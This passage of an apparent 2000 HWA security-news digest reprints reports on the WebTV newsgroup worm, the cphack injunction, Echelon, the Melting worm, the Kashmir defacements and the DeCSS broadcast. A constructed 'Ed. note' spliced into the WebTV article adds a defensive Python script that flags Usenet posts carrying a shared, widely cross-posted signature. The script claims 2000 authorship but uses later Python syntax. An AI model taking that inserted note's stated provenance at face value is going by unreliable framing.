http://www.wired.com/news/technology/0,1282,35045,00.html

WebTV's 'Non-Virus' Virus
by Chris Oakes

3:00 a.m. Mar. 18, 2000 PST

Although it prefers to call the trouble a "malicious code," WebTV has experienced its first virus. Parent company Microsoft is working on a patch of its service to counteract malicious programming code that overloads WebTV newsgroup discussions with fake postings.
"Newsgroups are starting to flood with junk posts, and you can't post," said Brian Bock, editor-in-chief of Net4TV Voice, an online publication focusing on Internet services via television. WebTV users first reported the problem to Net4TV. Bock said the virus -- a first for the closed, non-PC WebTV system -- is like the renowned PC virus Melissa. The similarity is that it self-replicates, he said. But this virus does it by altering signatures that appear at the bottom of WebTV user's Usenet messages. "When another WebTV user runs across [an infected message], it writes the virus into their email signature," he said. "Then when they go make a Usenet posting, it cross-posts. They end up posting to a whole bunch of different news groups." The result is the multiplication of junk messages in discussion forums until discussions are disrupted completely because the system's maximum number of viewable messages is reached. Microsoft was extremely reluctant to call the problem a virus. "It's not a virus," said Microsoft spokeswoman Claire Haggard. "There's never been a virus on WebTV." Then what is it? Haggard said the problem was malicious code in WebTV's Usenet posting system. The company took issue with the description of the code as "self-replicating," saying it had to be "manually" inserted in Usenet posts and didn't self-replicate. Furthermore, Haggard said the multiplying Usenet messages did not involve the exploitation of a user's signature. Bock said the virus does make use of an existing flaw in the service's email system. That hole is exploited along with a WebTV code for posting messages, Bock said. The issues are separate, Haggard said. In any case, the problem gets awfully close to meeting the conventional definition of virus: a malicious code that, once installed, performs usually undesirable tasks on the victim's computer. 
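Ed. note: whatever label Microsoft prefers, the behaviour Bock describes leaves two marks that are visible on the wire without knowing how the code got into anyone's signature: the same signature block turns up under many different posters, and each of those posts carries an unusually long Newsgroups header. A news admin cleaning up can key on both. The script below is an added example written for this issue, not code from Wired, Net4TV, HNN or Microsoft. It parses raw articles, isolates the signature after the conventional "-- " delimiter, clusters articles by signature fingerprint and flags clusters shared by several senders where at least one post was cross-posted widely. The sample articles, sender addresses, group names and the marker line standing in for the payload are all constructed.

```python
"""Flag Usenet articles whose signature block is a shared, cross-posting payload.

Added example for HWA; constructed sample data, not the real WebTV code.
"""
import hashlib
from collections import defaultdict

SIG_SEP = "\n-- \n"  # conventional signature delimiter: a line holding "-- "


def parse_article(raw):
    """Split a raw article into headers, body text and signature block."""
    head, _, body = raw.partition("\n\n")
    headers = {}
    for line in head.splitlines():
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    text, sep, sig = body.rpartition(SIG_SEP)
    if not sep:  # no "-- " line: everything is body, there is no signature
        text, sig = body, ""
    groups = [g.strip() for g in headers.get("newsgroups", "").split(",") if g.strip()]
    return {
        "id": headers.get("message-id", ""),
        "from": headers.get("from", ""),
        "groups": groups,
        "text": text.strip(),
        "sig": sig.strip(),
    }


def sig_fingerprint(sig):
    """Hash of the signature with case and whitespace normalised away, so
    trivial reformatting of the payload does not split a cluster."""
    norm = " ".join(sig.split()).lower()
    return hashlib.sha1(norm.encode("utf-8")).hexdigest()[:12]


def find_signature_worm(raw_articles, min_posters=3, min_xpost=4):
    """Return {fingerprint: cluster} for signature blocks seen under at least
    min_posters distinct senders where at least one post went to min_xpost or
    more groups. A personal signature belongs to one poster and a real thread
    rarely spans that many groups, so the two traits together separate the
    propagating payload from ordinary signatures."""
    clusters = defaultdict(lambda: {"posters": set(), "ids": [], "xpost": 0})
    for raw in raw_articles:
        art = parse_article(raw)
        if not art["sig"]:
            continue
        c = clusters[sig_fingerprint(art["sig"])]
        c["posters"].add(art["from"])
        c["ids"].append(art["id"])
        c["xpost"] = max(c["xpost"], len(art["groups"]))
    return {fp: c for fp, c in clusters.items()
            if len(c["posters"]) >= min_posters and c["xpost"] >= min_xpost}


def make_article(msgid, sender, groups, body, sig=None):
    """Build a minimal article; sig=None means no signature block at all."""
    raw = (f"Message-ID: <{msgid}>\nFrom: {sender}\nNewsgroups: {','.join(groups)}\n"
           f"Subject: test post\n\n{body}")
    if sig is not None:
        raw += SIG_SEP + sig + "\n"
    return raw


# Constructed data: the marker line stands in for whatever the real payload was.
WORM_SIG = "check out my page\nXPOST-PAYLOAD-MARKER (constructed stand-in, not the real code)"
MANY_GROUPS = [f"alt.test.group{i}" for i in range(8)]
SAMPLE_ARTICLES = [
    make_article(f"w{i}@example.invalid", f"user{i}@example.invalid", MANY_GROUPS,
                 "hi all", WORM_SIG)
    for i in range(4)
] + [
    make_article("a1@example.invalid", "alice@example.invalid", ["alt.test.group0"],
                 "normal post", "Alice\nFlushing, NY"),
    make_article("b1@example.invalid", "bob@example.invalid",
                 ["alt.test.group0", "alt.test.group1"], "cross-posted on purpose", "Bob"),
    make_article("c1@example.invalid", "carol@example.invalid", ["alt.test.group2"],
                 "no signature here"),
]


def flagged_ids(raw_articles=SAMPLE_ARTICLES):
    """Message-IDs of every article that belongs to a flagged signature cluster."""
    ids = []
    for c in find_signature_worm(raw_articles).values():
        ids.extend(c["ids"])
    return sorted(ids)


if __name__ == "__main__":
    for fp, c in find_signature_worm(SAMPLE_ARTICLES).items():
        print(f"sig {fp}: {len(c['posters'])} posters, max cross-post {c['xpost']}, "
              f"{len(c['ids'])} articles")
    print("to remove:", flagged_ids())
```

On the sample, the four infected posts collapse into one cluster and the three ordinary posts are untouched, including Bob's deliberate two-group cross-post. Either trait alone would misfire: a popular quote used by many people as a signature would trip the shared-signature test, and a legitimate announcement would trip the cross-post test, which is why both thresholds are required before a message goes on the removal list.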
In most technical definitions, self-replication is not a prerequisite, although the Merriam-Webster definition of virus does include self-replication: "A computer program usually hidden within another seemingly innocuous program that produces copies of itself." Virus or not, manual or self-replicating, the malicious code will be patched, hopefully by next week, the company said. Meanwhile, WebTV will be removing the junk posts. Haggard said the company has only heard from 14 users inquiring about the problem. She said the company plans a regular update of its client and server software soon, and that "the upgrade will be made immune from such hacker problems." @HWA 45.0 HNN:Mar 20th:Liberia Claims Attack In CyberWar ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench President Charles Taylor of Liberia has claimed that his country is under attack in a cyber war but failed to say by whom. He made the statement after his government shut down two independent radio stations and their related web sites. Amnesty International and the US State Department have vigorously protested the station closings. Wired http://www.wired.com/news/politics/0,1283,35016,00.html 'Cyber War' in Liberia Reuters 7:00 a.m. Mar. 17, 2000 PST MONROVIA -- President Charles Taylor of Liberia, reacting to criticism of the government's closure of two radio stations, said a "cyber war" had been declared on his country. "A cyber war has been declared on Liberia and the government is doing everything possible to fight back," he said on Thursday at his Executive Mansion after signing into law seven bills. He did not say who was waging this war. Star, an independent radio station that was closed down on Wednesday, had an Internet news service popular with Liberians abroad that was also closed. 
The government justified the closures by saying that "agents provocateurs" were using the news media, especially radio stations, to create security problems. "The government took the action to prevent an outbreak of another war which could be caused by negative broadcasts to create hatred among the Liberian people through hate messages," Taylor said. Taylor's election in 1997 formally ended a civil war that he started in December 1989. The U.S. government joined human rights groups, local media, and the Press Union of Liberia in protesting against the closures. "The United States vigorously protests the unwarranted closure of these two radio stations and calls on the Government of Liberia to reopen them immediately, without conditions, and to return the confiscated equipment," the U.S. State Department said in a statement. Rights group Amnesty International has linked the closure of Star to a March 13 broadcast it made about a U.S. State Department report on human rights in Liberia. Star was established in 1997 by the Hirondelle Foundation, a Swiss-based non-governmental organization, with the help of the United States Agency for International Development. The second station, Radio Veritas, is run by the Roman Catholic Church. The government suspended the station but said it could start operating again if it provided a written assurance it would broadcast only religious material. The Catholic Archbishop of Monrovia said Veritas had a constitutional right to broadcast. "It is our constitutional right to disseminate information to the public and if we abuse the right, let the courts deal with us, not the executive," Archbishop Michael Kpakala Francis said in a statement released late on Thursday. "We will not give any commitment to the government of Liberia that will restrict us to religious programs," he added, denying that Veritas' license restricted it to religious broadcasts. 
@HWA 46.0 HNN:Mar 20th:Judge Bans Anti-Filter Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Aj U.S. District Judge Edward F. Harrington has granted an injunction requested by Microsystems Software Inc. to prevent distribution of cphack. Cphack was designed to bypass the surfing restrictions used by CyberPatrol as well as list every web site blocked by the software. The Judge's decision effectively blocks anyone from distributing the software. No defendants were present at the hearing; the next hearing is scheduled for March 27th. (This could be a rather serious threat to people's right to reverse engineer and to even write software.) MSNBC http://www.msnbc.com/news/383603.asp Associated Press - via Washington Post http://www.washingtonpost.com/wp-srv/aponline/20000317/aponline133352_000.htm Porn Software Injunction Issued By Martin Finucane Associated Press Writer Friday, March 17, 2000; 1:33 p.m. EST BOSTON –– A federal judge Friday ordered a halt to the distribution of a computer program that allows children to bypass software designed to keep them away from Internet pornography. Microsystems Software Inc. of Framingham, which sells the widely used "Cyber Patrol" filtering software, sued two computer experts who distributed the bypassing software via the Internet. The software, called "cphack," also discloses a list of sites that are blocked by the Cyber Patrol program. U.S. District Judge Edward F. Harrington ordered Matthew Skala, a self-described cryptography buff who attends the University of Victoria in British Columbia, and Eddy L.O. Jansson, believed to be living in Sweden, to stop spreading the "cphack" program. The judge also blocked distribution of the "cphack" software by anyone working with them. Microsystems attorney Irwin Schwartz said the judge's order extended to any "mirror" Web sites, where the program may have been copied and made available.
Another hearing is set for March 27 on the case. Skala and Jansson were not represented at Friday's hearing, and they did not immediately return e-mails seeking comment. Microsystems has said in its legal filings it would suffer "irreparable harm" from the publication of the bypassing software, which it said sought to destroy the market for its product by rendering it ineffective. "The practical effect is that ... children may bypass their parents' efforts to screen out inappropriate materials on the Internet," according to the filing made this week. Free speech advocates criticized the company's move to block distribution of the software. Peter Junger, a law professor at Case Western Reserve University in Cleveland and an advocate of free speech on the Internet, said it "looks like a rather horrifying challenge to people's right to write software" and to "reverse-engineer" software, which means figure out how it works. "The idea that one can prevent reverse-engineering of software and publishing the results of that reverse-engineering strikes me as a very dangerous restriction on free speech," he said before the judge's ruling. Chris Hansen, a senior lawyer with the national office of the American Civil Liberties Union, said there might be debate about whether distributing the bypass software was legal, but that the ACLU agreed with at least one role of the software – publicizing the list of blocked sites. "Parents who want to install these products ought to be able to do so," he said, adding, "How can you, as a parent, make an intelligent decision (on filtering software) if the product won't tell you what they're blocking?" © Copyright 2000 The Associated Press @HWA 47.0 HNN:Mar 20th:We Spy To Prevent Bribes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond A former Director of Central Intelligence, R. James Woolsey, has written a story about why the United States spies on its allies.
The primary reason given is to prevent bribery so that US companies can compete on an even playing field. (Sorry but I don't buy it, that is too much power for such a simple purpose but I guess the ends justify the means for the US Government. So why can't US citizens spy on their own government to make sure they are complying with the law? Where are the checks and balances?) Wall Street Journal - via Cryptome http://cryptome.org/echelon-cia2.htm 17 March 2000. Thanks to DB. We look forward to seeing and hearing James Woolsey and Duncan Campbell openly debate this controversy, in Congressional hearings, on global TV, the Internet, MilNet and IntelNet -- and all the Echelon surveillance stations based in countries of those who "can't compete with the US." See transcript of Woolsey's March 7 remarks on economic espionage to the Foreign Press Center: http://cryptome.org/echelon-cia.htm The Wall Street Journal, March 17, 2000 Why We Spy on Our Allies By R. James Woolsey, a Washington lawyer and a former Director of Central Intelligence. What is the recent flap regarding Echelon and U.S. spying on European industries all about? We'll begin with some candor from the American side. Yes, my continental European friends, we have spied on you. And it's true that we use computers to sort through data by using keywords. Have you stopped to ask yourselves what we're looking for? The European Parliament's recent report on Echelon, written by British journalist Duncan Campbell, has sparked angry accusations from continental Europe that U.S. intelligence is stealing advanced technology from European companies so that we can -- get this -- give it to American companies and help them compete. My European friends, get real. True, in a handful of areas European technology surpasses American, but, to say this as gently as I can, the number of such areas is very, very, very small. Most European technology just isn't worth our stealing. Why, then, have we spied on you? 
The answer is quite apparent from the Campbell report -- in the discussion of the only two cases in which European companies have allegedly been targets of American secret intelligence collection. Of Thomson-CSF, the report says: "The company was alleged to have bribed members of the Brazilian government selection panel." Of Airbus, it says that we found that "Airbus agents were offering bribes to a Saudi official." These facts are inevitably left out of European press reports. That's right, my continental friends, we have spied on you because you bribe. Your companies' products are often more costly, less technically advanced or both, than your American competitors'. As a result you bribe a lot. So complicit are your governments that in several European countries bribes still are tax-deductible. When we have caught you at it, you might be interested, we haven't said a word to the U.S. companies in the competition. Instead we go to the government you're bribing and tell its officials that we don't take kindly to such corruption. They often respond by giving the most meritorious bid (sometimes American, sometimes not) all or part of the contract. This upsets you, and sometimes creates recriminations between your bribers and the other country's bribees, and this occasionally becomes a public scandal. We love it. Why do you bribe? It's not because your companies are inherently more corrupt. Nor is it because you are inherently less talented at technology. It is because your economic patron saint is still Jean Baptiste Colbert, whereas ours is Adam Smith. In spite of a few recent reforms, your governments largely still dominate your economies, so you have much greater difficulty than we in innovating, encouraging labor mobility, reducing costs, attracting capital to fast-moving young businesses and adapting quickly to changing economic circumstances. You'd rather not go through the hassle of moving toward less dirigisme. It's so much easier to keep paying bribes. 
The Central Intelligence Agency collects other economic intelligence, but the vast majority of it is not stolen secrets. The Aspin-Brown Commission four years ago found that about 95% of U.S. economic intelligence comes from open sources. The Campbell report describes a sinister-sounding U.S. meeting in Washington where -- shudder! -- CIA personnel are present and the participants -- brace yourself -- "identify major contracts open for bid" in Indonesia. Mr. Campbell, I suppose, imagines something like this: A crafty CIA spy steals stealthily out of a safe house, changes disguises, checks to make sure he's not under surveillance, coordinates with a spy satellite and . . . buys an Indonesian newspaper. If you Europeans really think we go to such absurd lengths to obtain publicly available information, why don't you just laugh at us instead of getting in high dudgeon? What are the economic secrets, in addition to bribery attempts, that we have conducted espionage to obtain? One example is some companies' efforts to conceal the transfer of dual-use technology. We follow sales of supercomputers and certain chemicals closely, because they can be used not only for commercial purposes but for the production of weapons of mass destruction. Another is economic activity in countries subject to sanctions -- Serbian banking, Iraqi oil smuggling. But do we collect or even sort secret intelligence for the benefit of specific American companies? Even Mr. Campbell admits that we don't, although he can't bring himself to say so except with a double negative: "In general this is not incorrect." The Aspin-Brown Commission was more explicit: "U.S. Intelligence Agencies are not tasked to engage in 'industrial espionage' -- i.e. obtaining trade secrets for the benefit of a U.S. company or companies." The French government is forming a commission to look into all this. I hope the commissioners come to Washington. We should organize two seminars for them. 
One would cover our Foreign Corrupt Practices Act, and how we use it, quite effectively, to discourage U.S. companies from bribing foreign governments. A second would cover why Adam Smith is a better guide than Colbert for 21st-century economies. Then we could move on to industrial espionage, and our visitors could explain, if they can keep straight faces, that they don't engage in it. Will the next commission pursue the issue of rude American maitre d's? Get serious, Europeans. Stop blaming us and reform your own statist economic policies. Then your companies can become more efficient and innovative, and they won't need to resort to bribery to compete. And then we won't need to spy on you. @HWA 48.0 HNN:Mar 20th:LAPD Tells Parody Site To Chill ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Rho The Computer Crimes Division of the L.A. County Sheriff's Department has forced www.fortheloveofjulie.com to alter its content. Fearing that the fake stalking site was a little too real and that it could hamper probes of real crimes they strongly suggested that the owner make changes to the site or take it down. The site is meant to be entertaining and spooky similar to 'The Blair Witch Project'. CNN http://www.cnn.com/2000/TECH/computing/03/17/julie.folo/index.html Authorities tell faux-stalker site to tone it down March 17, 2000 Web posted at: 8:46 p.m. EST (0146 GMT) By D. Ian Hopper CNN Interactive Technology Editor (CNN) -- After getting over 2 million page views, the authors of a faux-stalker site got a call from someone who wasn't such a fan -- a police detective. A detective from the Computer Crimes Division of the L.A. County Sheriff's Department contacted Spark Factory president Tim Street Friday. 
According to authorities, the detective strongly suggested that Street take down FortheloveofJulie.com, a fake stalker site that aims to be an entertaining but spooky story in the tradition of last year's "The Blair Witch Project" phenomenon. The site is a shrine to "Julie" from her admirer, a video-store clerk who follows her home and to her work, taking videos and posting a journal complete with movie clips and pictures. The site has become very popular, Street says, through both word-of-mouth and media attention. While it's completely fake, many users failed to see a disclaimer because they're going through a publicized back door that bypasses SpookySites.com, where it's indexed. SpookySites contains a small disclaimer upon entering the site that informs users that the content within "may contain fictionalization." But like many others, the detective entered the site through a back door, missing the disclaimer. When he called Street, the site's author was skeptical. "He told me he was with the police department. I wanted to call him back to make sure, because practical jokes around here are running rampant," Street said. "One guy here said he was from the FBI." "We received a tip from an investigator on the East Coast," says Sgt. Larry Balich. Authorities found a photo in the site that clearly showed a vehicle and license plate, and traced it back to Street. "We thought we had a stalking situation on our hands," Balich says. "But we needed a victim. You can't investigate a case without a victim or witness, and we had neither." After contacting the district attorney's office, detectives found that no crime had been committed. Still, Street says, police "strongly suggested" that he take the site down or close the back door and make the disclaimer more obvious. "We're going to frame it inside CreepySites," Street said. "We'll have a bolder disclaimer that says FortheloveofJulie is fictitious, and Julie is not in any danger." 
"We don't think we have to," he says, "but we don't want to have any problems." Balich says the site was just a little too real and could hamper probes of real crimes. "It's troublesome to have something like this on the Internet," Balich says. "I consider it a misuse of a real positive thing." The site was taken down for most of the day but came back up in the afternoon with the intended changes. Street says he made the site as an "Internet soap opera" meant to entertain users who were in for a suspenseful thrill. "It's not our intent to be evil, creepy people," he says. "We're trying to showcase how this new experience can change entertainment on the Internet." Street says he has already left a message with the FBI to try to head off any more misunderstandings. @HWA 49.0 HNN:Mar 20th:New Windows Worm Virus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne A new worm virus that can shut down MS Windows platforms and make the operating system permanently unusable has been discovered by Computer Associates International. Once launched via MS Outlook under Windows 95, 98, 2000 or NT, Win32/Melting.Worm saves itself into a Windows directory under the name MeltingScreen.exe. It renames .exe files into .bin files. PC World http://www.pcworld.com/pcwtoday/article/0,1510,15777,00.html Windows ‘Worm’ Virus Slithers Computer Associates identifies virus that travels through Outlook. by Kathleen Ohlson, Computerworld March 17, 2000, 6:56 a.m. PT A new worm now "in the wild" has the potential to shut down Windows platforms and make the operating system permanently unusable. Computer Associates International discovered the worm, Win32/Melting.worm, on Tuesday, when customers started to find it in their e-mail systems, says Narender Mangalam, director of security solutions at CA. So far, it has hit some Fortune 1000 software companies, he says. 
"The risk level is moderate, and it hasn't caused too much damage because we believe we've caught it in time," Mangalam says. CA markets InoculateIT, a virus detection and prevention program. The Melting Worm is unleashed through Microsoft's Outlook running on Windows 95, 98, 2000, or NT, according to CA representatives. Once launched, the worm puts a copy of itself into a Windows directory as MeltingScreen.exe and remains in memory. Files with .exe extensions in a system's Windows directory are renamed with .bin extensions. As the worm renames files, including ones critical to operating Windows, these changes may render the operating system useless. The worm also starts to e-mail itself to all the names in a victim's Outlook address book and randomly executes other .exe files, Mangalam says. This potentially can take down a company's e-mail system. @HWA 50.0 HNN:Mar 20th:GNIT Now Freeware ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by m0nk Ellicit Organization has released a freeware version of their latest program, GNIT NT Vulnerability Scanner. The scanner checks for over a dozen NT vulnerabilities. Ellicit.org http://security.ellicit.org/ @HWA 51.0 HNN:Mar 20th:Online Criminals Labeled Boffins ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by dogcow The Australian Federal Police Commissioner, Mick Palmer, was recently quoted as saying that while much of online crime is currently "in the early stages it is being done by people who simply are boffins and are doing it by way of exploration rather than criminal intent." (Glad to see that Australia is on top of Internet crime.) 
Sydney Morning Herald http://www.smh.com.au/news/0003/18/national/national6.html NATIONAL 'Police must get ahead of e-crime' By JANINE ISRAEL Undetected organised electronic-crime could undermine the nation's security and financial stability, the Australian Federal Police Commissioner, Mr Mick Palmer, warned yesterday. He told a conference of Australasian and south-west Pacific police commissioners in Canberra that a co-ordinated international response was required urgently to crack down on electronic terrorism, child pornography, racism, fraud and money laundering. Mr Palmer said the Internet meant crimes were being committed in countries where perpetrators had "never set foot" and international legislation and treaties must be set up to prosecute criminals irrespective of national borders. Australia, New Zealand, Fiji and Papua New Guinea police commissioners announced they would establish an Australasian Law Enforcement Electronic Crime Strategy to address the issue. Mr Palmer said the Australian police force lacked electronic expertise, and were looking to recruit computer boffins to tackle electronic crime. "We need to be buying those skills from the cutting edge of the technological workplace. We need to form close partnerships with the private sector and wider government agencies," he said. But employing people with the skills to fight electronic crime was costly. Retention was a problem in a competitive market where those with technological skills were lured by high salaries to the private sector. The international nature of cyberspace made it almost impossible to identify perpetrators let alone snare electronic criminals. Credit card fraud already was costing the credit card industry billions, Mr Palmer said. He said growing forms of e-crime included such things as money laundering and tax evasion. Cyber-stalking, illegal interceptions or "electronic eavesdropping" were a concern, as were political and industrial espionage. 
Fraudulent sales pitches along with bogus charitable or investment solicitations were increasingly common. These were not necessarily "new crimes", Mr Palmer said, just "new methods to commit traditional crimes". "One of the difficulties with electronic crime is that not only is it very intrusive and superficially invisible, but many crimes can be committed without the victim knowing it has been committed," he said. While e-crime is still in its "embryo state", authorities predict it will expand with the electronic market to become more organised and sophisticated. "Much of it in the early stages is being done by people who simply are boffins and are doing it by way of exploration rather than criminal intent. The damage caused by those activities is of course equally serious," he said. He said police were "alarmed" by the capability of people to commit offences on a global basis, with complete anonymity, with speed and on a large scale. A staggering 900 million people were expected to be using the Internet by the end of the year. @HWA 52.0 HNN:Mar 21st: Conflict In Kashmir Continues Online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre Over 600 web sites in India including government systems have been defaced in recent months by people in Pakistan. The conflict in Kashmir is seen as one of the primary reasons for the defacements. CNN http://www.cnn.com/2000/TECH/computing/03/20/pakistani.hackers/index.html Kashmir conflict continues to escalate -- online By D. Ian Hopper CNN Interactive Technology Editor March 20, 2000 Web posted at: 8:15 p.m. EST (0115 GMT) (CNN) -- A group of Pakistani hackers has used the conflict in Kashmir as a reason to deface almost 600 Web sites in India and take control of several Indian government and private computer systems, according to the group. A computer security Web site -- attrition.org -- has records of the defacements claimed by the Muslim Online Syndicate. 
The M0S, which a member says consists of mostly Pakistani Muslims, is made up of self-proclaimed "hacktivists," those who commit computer crimes -- ranging from simple defacement to full-scale intrusions to denial of service attacks -- in order to bring attention to a social cause. The group has nine active members, according to a representative who spoke on behalf of the group on condition of anonymity. They range from 16 to 24 years old, the representative said. Several of them are students or computer professionals, and one is a medical student, the representative added. Unlike the majority of Web vandals, the MOS members say they secretly take control of a server, then deface the site only when they "have no more use" for the data or the server itself. "The servers we control range from harmless mail and Web services to 'heavy duty' government servers," says the MOS representative. "The data is only being categorically archived for later use if deemed necessary." The group says it's not interested in e-commerce sites or credit card information. Most of the group's defacements came in one fell swoop, when they broke into India's largest Internet service provider, IndiaLinks. While there, they defaced more than 500 sites hosted by the company, including many travel and company sites, IndiaLinks confirms. IndiaLinks, based in Bombay, hosts more than 6,000 Web sites, according to CEO Bhavin Chandarana. Chandarana says the group had access to servers co-hosted by Alabanza, an American ISP. He says the group had access for about an hour. The MOS won't be facing any legal problems stemming from its exploits, Chandarana says, because IndiaLinks was not able to get the server logs from Alabanza. Chandarana says his company is in the process of removing their business from the U.S. ISP. Representatives for Alabanza did not respond to several e-mails and two phone messages requesting comment. One of the Web sites defaced was that of the Indian Science Congress 2000. 
The ISC's local organizing secretary, Bhushan Patwardhan, told The Hindu newspaper that the defacement was removed as soon as it was detected. The MOS has a Web site mirroring its attacks that contains a well-known expletive. Expletives in domain names used to be taboo, but with the deregulation of domain registration, it is no longer forbidden. "We hope to bring the Kashmir conflict to the world's attention," MOS says. "We wish to see the day when our Muslim brethren will be given the right to choose, as was promised them half a century ago." India and Pakistan have fought two wars over the last half-century over rival claims for the Himalayan territory of Kashmir. They clashed again last summer when Pakistan-based fighters seized mountain peaks inside India. Hundreds of militants died before India and Pakistan -- under international and domestic pressure -- withdrew their forces. Ignoring world pressure, India and Pakistan both tested nuclear devices in 1998, dramatically escalating tensions. The stated goal of the MOS -- social action through hacking -- is becoming a more popular one. Hacktivists attacked the World Trade Organization Web site during their Seattle conference last year, and a mailing list helps concerned activists discuss strategy, targets and coordinate attacks. Rather than simply defacing sites, denial of service attacks have become the weapon of choice. Alex Fowler, Strategic Initiatives Director for the Electronic Frontier Foundation, predicted this escalation in October 1999 in an interview with CNN Interactive. "We will see very serious attacks. Information stealing could have very long-term consequences for consumers," Fowler said. @HWA 53.0 HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Army Maj. 
Sheryl French has said that the possibility exists for intruders to infiltrate the computer systems used in tanks and other armored vehicles. Modern tanks and ships make extensive use of computers, software and data communications links for functions such as navigation, targeting and command and control. DISA has already tested the possibility of inputting false navigation data into a ship's computer from an unauthorized land-based laptop. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0320/web-hacker-03-21-00.asp Hacker-controlled tanks, planes and warships? BY Dan Verton 03/21/2000 Army officials are worried that sophisticated hackers and other cybercriminals, including military adversaries, may soon have the ability to hack their way into and take control of major military weapon systems such as tanks and ships. Speaking this month at the annual Army Directors of Information Management Conference in Houston, Army Maj. Sheryl French, a program manager responsible for the Army’s Information Assurance Architecture for the Digitized Force, said the potential exists for hackers to infiltrate the computer systems used in tanks and other armored vehicles. Unlike in the past, today’s modern tanks and ships are almost entirely dependent on computers, software and data communications links for functions such as navigation, targeting and command and control. Although the Pentagon has always had computer security issues to deal with, "we’ve never had computers" in tanks and armored personnel carriers before, said French, pointing to a picture of an M-1 Abrams Main Battle Tank. In fact, the Defense Department has already tested and proven that hackers have the ability to infiltrate the command and control systems of major weapons, including Navy warships.
According to a training CD-ROM on information assurance, published by the Defense Information Systems Agency, an Air Force officer sitting in a hotel room in Boston used a laptop computer to hack into a Navy ship at sea and implant false navigation data into the ship’s steering system. "Yes, this actually happened," the CD-ROM instructs military personnel taking the course. "Fortunately, this was only a controlled test to see what could be done. In reality, the type of crime and its objective is limited only by people’s imagination and ability." John Pike, a defense and intelligence analyst with the Federation of American Scientists, said that although there are well-known security gaps in the commercial systems that the Army plans to use on the battlefield, hacking into tanks and other weapons may prove to be too difficult for an enemy engaged in battle. "The problem for the enemy is that computer security vulnerabilities will almost certainly prove fleeting and unpredictable," said Pike, adding that such tactics would be nearly impossible to employ beyond the random harassment level. @HWA 54.0 HNN:Mar 21st:2600 AU to Broadcast DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by hool In yet another twist in the MPAA vs. DeCSS case, 2600 Australia plans to broadcast the source code of DeCSS on national TV. Australian Federal copyright laws cannot currently prevent this broadcast. The information will be displayed at 12 frames per second; it is recommended that viewers tape-record the information and review it later frame by frame. The code is expected to air sometime in the next few weeks between 3 and 4 am.
Computerworld AU http://www.computerworld.idg.com.au/CWT1997.nsf/cwtoday/DB6C6D9B3448ECE64A2568A00075454B?OpenDocument 2600 AU http://www.2600.org.au ComputerWorld; Hackers with heart By Byron Kaye 13 March, 2000 SYDNEY - Loopholes in Federal laws mean hacker advocate group 2600 Australia will be able to broadcast DVD decryption codes and other sensitive information on national television within weeks. Grant Bayley, who heads up 2600 Australia, the international organisation's Australian operation, said it was currently devising a 15-second broadcast, which he said would contain text files, delivered at 12 frames per second, and suggestions pertaining to the "ethics" of datacasting, computer security and privacy, and access-controlling DVD encryption. Bayley said the text contained in the broadcast would not be comprehensible as it appeared live on television, but he suggested viewers record the broadcast on video and then watch the information afterwards "frame by frame". Bayley said the broadcast would be "fed" to Channel 10 by MindShare, a company that supplies advertising material in bulk for the television station. MindShare's own advertising slogan is "Head space invaders". The broadcast time was not yet known, but Bayley said it was expected to screen between 3:00 and 4:00 am "some time in the next few weeks". Bayley maintained information contained in the broadcast would "primarily encourage ethical", educational use of new technologies such as datacasting. However, he admitted some information -- pertaining to the decryption of DVD access codes -- which could not be legally broadcast in the US, would be screened. Australian Federal copyright laws, even those currently being amended, were unable to prevent broadcasting of information such as DVD decryption codes, regardless of how commercially crippling the information might potentially be, he said. 
Bayley said he was convinced that he knew the 15-year-old hacker who penetrated the ASX website two weeks ago "pretty well". The ASX hack caused an outage of four hours, leaving the site littered with banner messages reading "Prosthetic owns the ASX". Bayley maintained 2600 did not support or encourage vandalistic hack attacks such as this. "Stupid people do stupid things," he said. The title "2600" refers to the frequency of pitch that technology-savvy Americans played into their telephone receivers to thwart long distance call charges in the early 1980s. @HWA 55.0 HNN:Mar 21st:CIA Monitoring Upheld by Court ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The CIA's Foreign Broadcast Information Service (FBIS) policy allowing agency officials to monitor employees' Internet use has been upheld by a federal appeals court. The policy included provisions to review employees' e-mail messages and to collect information on their Web site visits. The policy had helped convict a federal employee of downloading child pornography on government time. Government Executive Magazine http://www.govexec.com/dailyfed/0300/032000m1.htm March 20, 2000 DAILY BRIEFING Court upholds agency reviews of employees' Internet use By Kellie Lunney klunney@govexec.com A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time. The CIA's Foreign Broadcast Information Service implemented a policy in June 1998 authorizing "electronic audits" of employee computers in order to crack down on non-business related Internet use. Those audits included reviewing employees' e-mail messages and collecting information on their Web site visits. Later that summer, Science Applications International Corp.
(SAIC), which had a contract to manage FBIS' computer network and monitor inappropriate Internet behavior, alerted the agency when the keyword "sex" turned up numerous hits in a firewall database during a routine test. The hits originated from the computer of Mark L. Simons, an electronic engineer at FBIS.

